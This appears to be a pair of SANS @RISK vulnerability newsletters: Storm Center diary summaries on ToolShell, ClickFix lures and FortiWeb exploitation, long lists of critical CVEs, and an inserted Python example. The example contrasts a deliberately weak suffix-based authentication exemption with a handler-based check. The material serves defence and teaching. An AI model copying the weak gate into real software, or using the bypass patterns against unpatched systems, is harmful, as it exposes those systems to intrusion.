@RISK: The Consensus Security Vulnerability Alert: Vol. 25, Num. 46

CONTENTS:
=========================================================
INTERNET STORM CENTER SPOTLIGHT
OTHER INTERNET STORM CENTER ENTRIES
RECENT CVEs
=========================================================

INTERNET STORM CENTER SPOTLIGHT

ISC provides a free analysis and warning service to thousands of Internet users and organizations, and is actively working with Internet Service Providers to fight back against the most malicious attackers. https://isc.sans.edu/about.html

[Guest Diary] Hunting for SharePoint In-Memory ToolShell Payloads
Published: 2025-12-02
Last Updated: 2025-12-01 23:27:08 UTC
by James Woodworth, SANS.edu BACS Student (Version: 1)

[This is a Guest Diary by James Woodworth, an ISC intern as part of the SANS.edu Bachelor’s Degree in Applied Cybersecurity (BACS) program.]

In July 2025, many of us were introduced to the Microsoft SharePoint exploit chain known as ToolShell. ToolShell exploits the deserialization and authentication bypass vulnerabilities, CVE-2025-53770 and CVE-2025-53771, in on-premises SharePoint Server 2016, 2019, and Subscription editions. When the exploit chain was initially introduced, threat actors used payloads that attempted to upload web shells to a SharePoint server’s file system. The problem for threat actors was that the uploaded web shells were easily detectable by most Endpoint Detection and Response (EDR) solutions. So the threat actors upped the game and reworked their payloads to execute in-memory. This new technique made it more difficult for defenders to detect the execution of these new payloads.

Many articles have been written on the technical details of the ToolShell vulnerabilities, so I won’t go into an in-depth analysis here. If you want an in-depth analysis, check out the Securelist article, ToolShell: a story of five vulnerabilities in Microsoft SharePoint. What I will present to you in this post is a process using Zeek Network Security Monitor, DaemonLogger, and Wireshark to hunt for in-memory ToolShell exploit payloads and how to decode them for further analysis.

Review Zeek Logs
The first step in the hunt is to review the HTTP requests to our SharePoint server. We will do this by reviewing our Zeek http logs and looking for POST requests that contain the following indicators of a malicious request …

Read the full entry: https://isc.sans.edu/diary/Guest+Diary+Hunting+for+SharePoint+InMemory+ToolShell+Payloads/32524/

Conflicts between URL mapping and URL based access control
Published: 2025-11-24
Last Updated: 2025-11-24 16:54:38 UTC
by Johannes Ullrich (Version: 1)

We continue to encounter high-profile vulnerabilities related to the use of URL mapping (or “aliases”) with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today …

This request attempts to exploit a vulnerability in Hitachi Vantara Pentaho Business Analytics Server (CVE-2022-43939 and CVE-2022-43769). In this case, the end of the URL (/require[.]js) bypasses authentication. However, the request is still processed by “ldapTreeNodeChildren”, which is vulnerable to a template injection, causing the code to be executed. As last week, it appears that the “Chicago Rapper” Rondo botnet is again exploiting this vulnerability.

However, let’s examine the underlying cause of this issue.

For many applications, it makes sense to exempt certain URLs from authentication. For example, help pages, a password reset page, or a customer support contact page may need to be accessible even if the user is not logged in.

Webservers offer a wide range of options to map URLs to files on the web server’s file system. For example, for our API, we use this directive in Apache’s configuration …

Read the full entry: https://isc.sans.edu/diary/Conflicts+between+URL+mapping+and+URL+based+access+control/32518/
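The conflict described in the entry above, as an added example that is not the Pentaho, Apache or ISC code: a constructed route table and constructed URLs show an authentication exemption keyed on the raw URL suffix beside one applied only after the request has been mapped to its handler, plus an audit helper that generalizes the check to any list of sample URLs.

```python
"""
Why a URL-based authentication exemption and the server's URL-to-handler
mapping must agree. Added example with a constructed route table and
constructed URLs; it is not the Pentaho, Apache or ISC code.
"""
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed route table: longest matching prefix wins, as a servlet or
# Apache Alias/Location mapping would. Value: (handler name, requires_auth).
ROUTES = {
    "/static/": ("static_file", False),
    "/help/": ("help_page", False),
    "/api/": ("api_handler", True),
    "/": ("index", False),
}

# Suffixes a naive filter treats as "static assets that need no login".
PUBLIC_SUFFIXES = (".js", ".css", ".png")


def canonical_path(raw_url: str) -> str:
    """Decode and normalize the path so the gate and the router see the same
    string (the router in a real server does this for you; a URL-based
    access-control filter often does not)."""
    path = unquote(urlsplit(raw_url).path)
    norm = posixpath.normpath(path)
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"  # normpath strips a trailing slash; keep it
    return norm


def resolve(path: str) -> tuple[str, bool]:
    """Map a canonical path to (handler, requires_auth) by longest prefix."""
    prefix = max((p for p in ROUTES if path.startswith(p)), key=len)
    return ROUTES[prefix]


def naive_gate(raw_url: str, authenticated: bool) -> bool:
    """Weak pattern: the exemption looks only at how the raw URL ends and
    never asks which handler will actually run."""
    if urlsplit(raw_url).path.endswith(PUBLIC_SUFFIXES):
        return True
    return authenticated


def routed_gate(raw_url: str, authenticated: bool) -> bool:
    """Hardened pattern: resolve the handler first, then apply that
    handler's policy. The exemption is a property of the handler, not of
    the URL text."""
    _handler, requires_auth = resolve(canonical_path(raw_url))
    return authenticated or not requires_auth


def dispatch(raw_url: str, authenticated: bool, gate) -> str:
    """Run the gate, then route exactly as the server would. Returns the
    handler name that executes, or '401' if the gate refused."""
    if not gate(raw_url, authenticated):
        return "401"
    handler, _ = resolve(canonical_path(raw_url))
    return handler


def find_conflicts(sample_urls, gate) -> list[str]:
    """Audit helper: URLs an unauthenticated client gets past `gate` even
    though the handler they reach requires authentication."""
    bad = []
    for url in sample_urls:
        handler, requires_auth = resolve(canonical_path(url))
        if requires_auth and gate(url, authenticated=False):
            bad.append(f"{url} -> {handler}")
    return bad


# Constructed sample requests.
SAMPLES = [
    "/static/app.js",
    "/help/faq",
    "/api/tree",
    "/api/tree/require.js",  # protected handler, asset-looking suffix
]

if __name__ == "__main__":
    for gate in (naive_gate, routed_gate):
        print(gate.__name__, find_conflicts(SAMPLES, gate))
```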

Use of CSS stuffing as an obfuscation technique?
Published: 2025-11-21
Last Updated: 2025-11-21 09:48:20 UTC
by Jan Kopriva (Version: 1)

From time to time, it can be instructive to look at generic phishing messages that are delivered to one’s inbox or that are caught by basic spam filters. Although one usually doesn’t find much of interest, sometimes these little excursions into what should be a run-of-the-mill collection of basic, commonly used phishing techniques can lead one to find something new and unusual. This was the case with one of the messages delivered to our handler inbox yesterday …

Read the full entry: https://isc.sans.edu/diary/Use+of+CSS+stuffing+as+an+obfuscation+technique/32510/

HOLIDAY HACK CHALLENGE

The 2025 SANS Holiday Hack Challenge is officially open!
Create your avatar, explore the new holiday adventure, and put your cybersecurity skills to the test through interactive challenges and puzzles. See if you’ve got what it takes to save the holidays.

https://www.sans.org/cyber-ranges/holiday-hack-challenge

New Features This Year:

CTF-Only Mode – Jump straight into the technical action
Micro-Challenges – 10–15 min puzzles for quick, festive wins
Capstones – Longer, deeper challenges to truly level up

OTHER INTERNET STORM CENTER ENTRIES

YARA-X 1.10.0 Release: Fix Warnings (2025.11.23)
https://isc.sans.edu/diary/YARAX+1100+Release+Fix+Warnings/32514/

Wireshark 4.4.1 Released (2025.11.23)
https://isc.sans.edu/diary/Wireshark+441+Released/32512/

Oracle Identity Manager Exploit Observation from September (CVE-2025-61757) (2025.11.20)
https://isc.sans.edu/diary/Oracle+Identity+Manager+Exploit+Observation+from+September+CVE202561757/32506/

RECENT CVEs
The list is assembled by pulling recent vulnerabilities from NIST NVD, Microsoft, Twitter mentions of vulnerabilities, ISC Diaries and Podcast, and the CISA list of known exploited vulnerabilities. There are also some unscored, but significant, vulnerabilities at the end. This includes vulnerabilities that have not been added to the NVD yet.

CVE-2025-53770 – Microsoft SharePoint Server is vulnerable to code execution by unauthorized attackers through deserialization of untrusted data, with an exploit already in the wild for CVE-2025-53770.
Product: Microsoft SharePoint Server
CVSS Score: 0
** KEV since 2025-07-20 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53770
ISC Diary: https://isc.sans.edu/diary/32524

CVE-2025-53771 – Microsoft Office SharePoint is susceptible to path traversal which could enable a spoofing attack over a network.
Product: Microsoft Office SharePoint
CVSS Score: 0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-53771
ISC Diary: https://isc.sans.edu/diary/32524

CVE-2025-48633 – Android Framework contains an unspecified vulnerability that allows for information disclosure.
Product: Android Framework
CVSS Score: N/A
** KEV since 2025-12-02 **
CVE Record: https://www.cve.org/CVERecord?id=CVE-2025-48633 (Reserved)
ISC Podcast: https://isc.sans.edu/podcastdetail/9720
References: https://source.android.com/docs/security/bulletin/2025-12-01

CVE-2025-48572 – Android Framework contains an unspecified vulnerability that allows for privilege escalation.
Product: Android Framework
CVSS Score: N/A
** KEV since 2025-12-02 **
CVE Record: https://www.cve.org/CVERecord?id=CVE-2025-48572 (Reserved)
ISC Podcast: https://isc.sans.edu/podcastdetail/9720
References: https://source.android.com/docs/security/bulletin/2025-12-01

CVE-2025-58360 – GeoServer versions 2.26.0 to 2.26.2 and 2.25.6 are vulnerable to an XML External Entity (XXE) exploit through the /geoserver/wms endpoint allowing attackers to define external entities within XML requests.
Product: GeoServer
CVSS Score: 8.2
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
ISC Podcast: https://isc.sans.edu/podcastdetail/9718
NVD References:
https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
https://osgeo-org.atlassian.net/browse/GEOS-11682

CVE-2025-60739 – Ilevia EVE X1 Server Firmware Version v4.7.18.0.eden and before, Logic Version v6.00 – 2025_07_21 is vulnerable to CSRF, allowing remote attackers to execute arbitrary code via the /bh_web_backend component.
Product: Ilevia EVE X1 Server Firmware
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60739

CVE-2025-63729 – Syrotech SY-GPON-1110-WDONT allows attackers to extract sensitive SSL information from firmware.
Product: Syrotech SY-GPON-1110-WDONT SYRO_3.7L_3.1.02-240517
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63729

CVE-2025-33187 – NVIDIA DGX Spark GB10 has a vulnerability in SROOT, allowing attackers with privileged access to potentially execute code, disclose information, tamper with data, disrupt services, or escalate privileges.
Product: NVIDIA DGX OS
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-33187
NVD References:
https://nvidia.custhelp.com/app/answers/detail/a_id/5720
https://www.cve.org/CVERecord?id=CVE-2025-33187

CVE-2025-65084 – Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.207 and prior are vulnerable to an Out-of-Bounds Write flaw that could lead to information disclosure or code execution.
Product: Ashlar-Vellum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65084
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01

CVE-2025-65085 – Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share versions 12.6.1204.207 and prior are vulnerable to a Heap-based Buffer Overflow flaw that could lead to data disclosure or code execution.
Product: Ashlar-Vellum
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65085
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-01

CVE-2025-61168 – SIGB PMB v8.0.1.14 is vulnerable to remote code execution through unserializing arbitrary files in cms_rest.php.
Product: SIGB PMB
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-61168

CVE-2025-64063 – Primakon Pi Portal 1.0.18 API endpoints lack sufficient authorization checks, allowing standard users to bypass UI restrictions, manipulate data outside their scope, and potentially compromise data integrity and confidentiality.
Product: Primakon Project Contract Management
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64063

CVE-2025-51742 through CVE-2025-51746 – JSH_ERP 2.3.1 by jishenghua is vulnerable to Fastjson deserialization.
Product: JSH_ERP
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51742
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51743
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51744
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51745
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51746

CVE-2025-64656 – Out-of-bounds read in Application Gateway allows an unauthorized attacker to elevate privileges over a network.
Product: Microsoft Application Gateway
CVSS Score: 9.4
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64656
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64656

CVE-2025-64657 – Stack-based buffer overflow in Azure Application Gateway allows an unauthorized attacker to elevate privileges over a network.
Product: Microsoft Azure Application Gateway
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64657
NVD References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64657

CVE-2025-66022 – FACTION allows unauthenticated users to upload malicious extensions that can execute arbitrary system commands on the host running Faction before version 1.7.1, enabling remote code execution (RCE).
Product: FACTION PenTesting Report Generation and Collaboration Framework
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-66022

CVE-2025-59390 – Apache Druid’s Kerberos authenticator vulnerability allows for weak fallback secrets to be generated by `ThreadLocalRandom`, potentially enabling attackers to predict or brute force authentication cookies, leading to token forgery or authentication bypass.
Product: Apache Druid Kerberos authenticator
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59390
NVD References: http://www.openwall.com/lists/oss-security/2025/11/26/1

CVE-2025-62354 – Cursor allows unauthorized attackers to execute arbitrary code by improperly handling special elements in OS commands, leading to command injections.
Product: Cursor
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-62354

CVE-2025-65236 – OpenCode Systems USSD Gateway OC Release: 5 is vulnerable to SQL injection via the Session ID parameter in the /occontrolpanel/index.php endpoint.
Product: OpenCode Systems USSD Gateway OC
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65236

CVE-2025-55469 – Incorrect access control in youlai-boot v2.21.1 allows attackers to escalate privileges and access the Administrator backend.
Product: youlai youlai-boot
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55469

CVE-2025-64126 – The application is vulnerable to OS command injection due to lack of proper input validation, allowing attackers to inject arbitrary commands.
Product: Zenitel TCIV-3+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64126
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03

CVE-2025-64127 – The vulnerable product allows unauthenticated attackers to execute arbitrary commands remotely by incorporating user-supplied input into OS commands without proper validation.
Product: Zenitel TCIV-3+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64127
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03

CVE-2025-64128 – The vulnerable product is susceptible to OS command injection due to inadequate validation of user inputs, potentially enabling attackers to insert arbitrary commands.
Product: Zenitel TCIV-3+
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64128
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03

CVE-2025-64130 – Zenitel TCIV-3+ is susceptible to a reflected cross-site scripting vulnerability, enabling remote attackers to run malicious JavaScript on victims’ browsers.
Product: Zenitel TCIV-3+
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64130
NVD References: https://www.cisa.gov/news-events/ics-advisories/icsa-25-329-03

CVE-2025-26155 – NCP Secure Enterprise Client 13.18 and NCP Secure Entry Windows Client 13.19 have an Untrusted Search Path vulnerability.
Product: NCP Secure Enterprise Client 13.18
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-26155

CVE-2025-65669 – classroomio 0.1.13 allows students to delete courses from the Explore page without proper authorization, bypassing admin-only restrictions.
Product: classroomio 0.1.13
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65669

CVE-2025-50433 – Imonnit.com (2025-04-24) is vulnerable to malicious actors gaining escalated privileges and taking over arbitrary user accounts through a crafted password reset.
Product: Imonnit.com
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-50433

CVE-2025-65276 – HashTech project is vulnerable to unauthenticated administrative access, allowing attackers to take full control of the admin dashboard and perform various malicious activities.
Product: HashTech
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65276

CVE-2025-40934 – XML-Sig versions 0.27 through 0.67 incorrectly validate XML files if signatures are omitted, allowing attackers to pass verification checks by removing the signature from the XML document.
Product: XML-Sig Perl
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-40934

CVE-2025-12419 – Mattermost versions 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12, 11.0.x <= 11.0.3 are vulnerable to an issue where an authenticated attacker with team creation privileges can take over a user account by manipulating authentication data during the OAuth completion flow.
Product: Mattermost
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12419

CVE-2025-12421 – Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 have a vulnerability that allows an authenticated user to perform account takeover via a specially crafted email address when switching authentication methods.
Product: Mattermost
CVSS Score: 9.9
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12421

CVE-2025-64314 – Permission control vulnerability in the memory management module.
Impact: Successful exploitation of this vulnerability may affect confidentiality.
Product: Huawei Harmonyos
CVSS Score: 9.3
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64314

CVE-2025-65112 – PubNet is vulnerable to an identity spoofing and privilege escalation issue in version 1.1.3 due to unauthenticated users being able to upload packages as any user by providing arbitrary author-id values.
Product: PubNet Dart & Flutter package service
CVSS Score: 9.4
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65112

CVE-2025-35028 – HexStrike AI MCP server allows attackers to execute commands with root privileges by providing a command-line argument starting with a semi-colon to an API endpoint created by the EnhancedCommandExecutor class.
Product: HexStrike AI MCP server
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-35028

CVE-2025-12106 – OpenVPN fails to properly validate arguments, leading to a heap buffer over-read vulnerability.
Product: OpenVPN
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12106

CVE-2025-63525 – Blood Bank Management System 1.0 is vulnerable to authenticated attackers gaining elevated privileges through a crafted request in delete.php.
Product: Shridharshukl Blood_Bank_Management_System 1.0
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63525

CVE-2025-63531 – Blood Bank Management System 1.0’s receiverLogin.php component is vulnerable to SQL injection, enabling attackers to bypass authentication and access the system through manipulation of user-supplied input.
Product: Shridharshukl Blood_Bank_Management_System 1.0
CVSS Score: 10.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63531

CVE-2025-63532 – Blood Bank Management System 1.0’s cancel.php component allows attackers to inject SQL code through the search field, bypass authentication, and gain unauthorized access.
Product: Shridharshukl Blood_Bank_Management_System 1.0
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63532

CVE-2025-63535 – Blood Bank Management System 1.0 abs.php allows attackers to inject SQL code through the search field, leading to unauthorized system access.
Product: Shridharshukl Blood_Bank_Management_System 1.0
CVSS Score: 9.6
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-63535

CVE-2025-3500 – Avast Antivirus (25.1.981.6) on Windows is vulnerable to Integer Overflow and Privilege Escalation before version 25.3.
Product: Avast Antivirus
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-3500

CVE-2025-8351 – Avast Antivirus on MacOS is vulnerable to a Heap-based Buffer Overflow, Out-of-bounds Read issue during file scanning, potentially enabling Local Code Execution or Denial-of-Service of the antivirus engine process between versions 8.3.70.94 and 8.3.70.98.
Product: Avast Antivirus
CVSS Score: 9.0
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8351

CVE-2025-51682 – mJobtime 15.7.2 has a client-side authorization vulnerability allowing attackers to modify code and access administrative features.
Product: mJobtime 15.7.2
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-51682

CVE-2025-65836 – PublicCMS V5.202506.b is vulnerable to SSRF in the chat interface of SimpleAiAdminController.
Product: PublicCMS
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-65836

CVE-2025-66401 – MCP Watch is vulnerable to command injection in the cloneRepo method due to user-supplied githubUrl not being sanitized before passing to execSync.
Product: MCP Watch
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-66401

CVE-2025-41742 – Sprecher Automations SPRECON-E-C, SPRECON-E-P, SPRECON-E-T3 are vulnerable to unauthorized remote attacks due to default cryptographic keys, enabling attackers to manipulate projects and data or access devices through remote maintenance.
Product: Sprecher Automations SPRECON-E series
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41742
NVD References: https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511042_de.pdf

CVE-2025-41744 – Sprecher Automations SPRECON-E series has default cryptographic keys that can be exploited by remote attackers, compromising data confidentiality and integrity.
Product: Sprecher Automations SPRECON-E series
CVSS Score: 9.1
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-41744
NVD References: https://www.sprecher-automation.com/fileadmin/itSecurity/PDF/SPR-2511043_de.pdf

CVE-2025-6389 – The Sneeit Framework plugin for WordPress is vulnerable to Remote Code Execution in all versions up to 8.3 via the sneeit_articles_pagination_callback() function, allowing unauthenticated attackers to execute code on the server and potentially create new administrative user accounts.
Product: WordPress Sneeit Framework plugin
Active Installations: Unknown. Update to version 8.4, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-6389
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/b5ed8a39-50b0-4acf-9054-ba389c49f345?source=cve

CVE-2025-13559 – The EduKart Pro plugin for WordPress allows unauthenticated attackers to gain administrator access by exploiting a Privilege Escalation vulnerability.
Product: EduKart Pro WordPress
Active Installations: Unknown.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13559
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/d3a5be68-8073-48b0-a536-bb3a05e83dda?source=cve

CVE-2025-13595 – The CIBELES AI plugin for WordPress allows unauthenticated attackers to upload arbitrary files, leading to potential remote code execution.
Product: CIBELES AI plugin for WordPress
Active Installations: Unknown. Update to version 1.10.9, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13595
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/b3e89a1c-7606-4391-a389-fa18d0967046?source=cve

CVE-2025-13538 – The FindAll Listing plugin for WordPress allows unauthenticated attackers to gain administrator access by exploiting a Privilege Escalation vulnerability in versions up to 1.0.5.
Product: WordPress FindAll Listing plugin
Active Installations: Unknown. Update to version 1.1, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13538
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/14981949-271c-4f98-a6a1-b00619f1436d?source=cve

CVE-2025-13539 – The FindAll Membership plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.0.4, allowing unauthenticated attackers to potentially log in as administrative users.
Product: WordPress FindAll Membership plugin
Active Installations: Unknown. Update to version 1.1, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13539
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/a856a96a-68d2-462d-b523-840668980807?source=cve

CVE-2025-13540 – The Tiare Membership plugin for WordPress permits Privilege Escalation up to version 1.2 by allowing unauthenticated attackers to register as administrators through the ‘tiare_membership_init_rest_api_register’ function.
Product: Tiare Membership plugin for WordPress
Active Installations: Unknown. Update to version 1.3, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13540
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/6cf01a38-1fba-4c93-b3fa-acfdd5b19410?source=cve

CVE-2025-13675 – The Tiger theme for WordPress is vulnerable to Privilege Escalation allowing unauthenticated attackers to register as administrators.
Product: WordPress Tiger theme
Active Installations: Unknown
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13675
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/4750b57e-7d8d-49d7-bbbf-46483eb97bd9?source=cve

CVE-2025-13615 – The StreamTube Core plugin for WordPress allows unauthenticated attackers to change user passwords and potentially take over administrator accounts due to a vulnerability in versions up to 4.78.
Product: StreamTube WordPress Core plugin
Active Installations: Unknown. Update to version 4.79, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13615
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/b812a0d7-99a1-4f61-b78a-78cea6a2ada1?source=cve

CVE-2025-13542 – The DesignThemes LMS plugin for WordPress allows unauthenticated attackers to achieve Privilege Escalation by registering as administrators.
Product: DesignThemes LMS plugin for WordPress
Active Installations: Unknown. Update to version 1.0.5, or a newer patched version.
CVSS Score: 9.8
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-13542
NVD References: https://www.wordfence.com/threat-intel/vulnerabilities/id/c880470f-3f81-47a2-b450-7074410e9f43?source=cve

@RISK: The Consensus Security Vulnerability Alert: Vol. 25, Num. 45

CONTENTS:
=========================================================
INTERNET STORM CENTER SPOTLIGHT
OTHER INTERNET STORM CENTER ENTRIES
RECENT CVEs
=========================================================

INTERNET STORM CENTER SPOTLIGHT

Honeypot: FortiWeb CVE-2025-64446 Exploits
Published: 2025-11-15
Last Updated: 2025-11-15 09:44:35 UTC
by Didier Stevens (Version: 1)

Like many have reported, we too noticed exploit attempts for CVE-2025-64446 in our honeypots.

These are POST requests to this path …

With this User Agent String …

Read the full entry: https://isc.sans.edu/diary/Honeypot+FortiWeb+CVE202564446+Exploits/32486/

KongTuke activity
Published: 2025-11-18
Last Updated: 2025-11-18 07:10:17 UTC
by Brad Duncan (Version: 1)

Introduction

Today’s diary is an example of KongTuke activity using fake CAPTCHA pages for a ClickFix-style lure.

Also known as LandUpdate808 or TAG-124 and described as a sophisticated TDS system, KongTuke has been active since at least May 2024. I keep track of this campaign through the infosec.exchange Mastodon instance, which is mostly information from the @monitorsg profile.

With URLscan, I can pivot on the information from Mastodon to find compromised sites and generate infection traffic in my lab.

On Monday, 2025-11-17, I found an example of a legitimate website with a KongTuke-injected script, and I generated some infection traffic …

Read the full entry: https://isc.sans.edu/diary/KongTuke+activity/32498/

Finger[.]exe & ClickFix
Published: 2025-11-16
Last Updated: 2025-11-16 07:27:55 UTC
by Didier Stevens (Version: 1)

The finger[.]exe command is used in ClickFix attacks.

finger is a very old UNIX command that was converted to a Windows executable years ago, and has been part of Windows since then.

In the ClickFix attacks, it is used to retrieve a malicious script via the finger protocol.

We wrote about finger.exe about 3 years ago: “Finger[.]exe LOLBin”.

What you need to know:

finger communication takes place over TCP
the finger protocol uses TCP port 79 and there is no way to change this port
finger[.]exe is not proxy aware
So if you are in a corporate environment with an explicit proxy (and blocking all Internet facing communication that doesn’t go through the proxy), the finger.exe command won’t be able to communicate.

And if you have a transparent proxy, finger.exe will be able to communicate provided the proxy allows TCP connections to port 79 …

Read the full entry: https://isc.sans.edu/diary/Fingerexe+ClickFix/32492/

OTHER INTERNET STORM CENTER ENTRIES

Decoding Binary Numeric Expressions (2025.11.17)
https://isc.sans.edu/diary/Decoding+Binary+Numeric+Expressions/32490/

SANS Holiday Hack Challenge 2025 (2025.11.16)
https://isc.sans.edu/diary/SANS+Holiday+Hack+Challenge+2025/32488/

Microsoft Office Russian Dolls (2025.11.14)
https://isc.sans.edu/diary/Microsoft+Office+Russian+Dolls/32484/

Formbook Delivered Through Multiple Scripts (2021.11.13)
https://isc.sans.edu/diary/Formbook+Delivered+Through+Multiple+Scripts/32480/

SmartApeSG campaign uses ClickFix page to push NetSupport RAT (2025.11.12)
https://isc.sans.edu/diary/SmartApeSG+campaign+uses+ClickFix+page+to+push+NetSupport+RAT/32474/

RECENT CVEs

CVE-2025-64446 – Fortinet FortiWeb versions 8.0.0 through 8.0.1, 7.6.0 through 7.6.4, 7.4.0 through 7.4.9, 7.2.0 through 7.2.11, and 7.0.0 through 7.0.11 are vulnerable to relative path traversal, enabling attackers to execute administrative commands via specially-crafted HTTP or HTTPS requests.
Product: Fortinet Fortiweb
CVSS Score: 9.8
** KEV since 2025-11-14 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-64446
NVD References:
https://fortiguard.fortinet.com/psirt/FG-IR-25-910
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-64446

CVE-2025-58034 – Fortinet FortiWeb versions 8.0.0 through 8.0.1, 7.6.0 through 7.6.5, 7.4.0 through 7.4.10, 7.2.0 through 7.2.11, and 7.0.0 through 7.0.11 are vulnerable to OS command injection, which could allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands.
Product: Fortinet FortiWeb
CVSS Score: 7.2
** KEV since 2025-11-18 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58034
NVD References:
https://fortiguard.fortinet.com/psirt/FG-IR-25-513
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-58034

CVE-2025-12480 – Triofox is vulnerable to an Improper Access Control flaw, allowing access to initial setup pages post-completion in versions before 16.7.10368.56560.
Product: Triofox
CVSS Score: 0
** KEV since 2025-11-12 **
NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-12480
ISC Podcast: https://isc.sans.edu/podcastdetail/9696

CVE-2025-62215 – Windows Kernel is vulnerable to race conditions that can be exploited by an authorized attacker to locally elevate privileges.
Product: Microsoft Windows 10 1809
CVSS Score: 7.0
** KEV since 2025-11-12 **
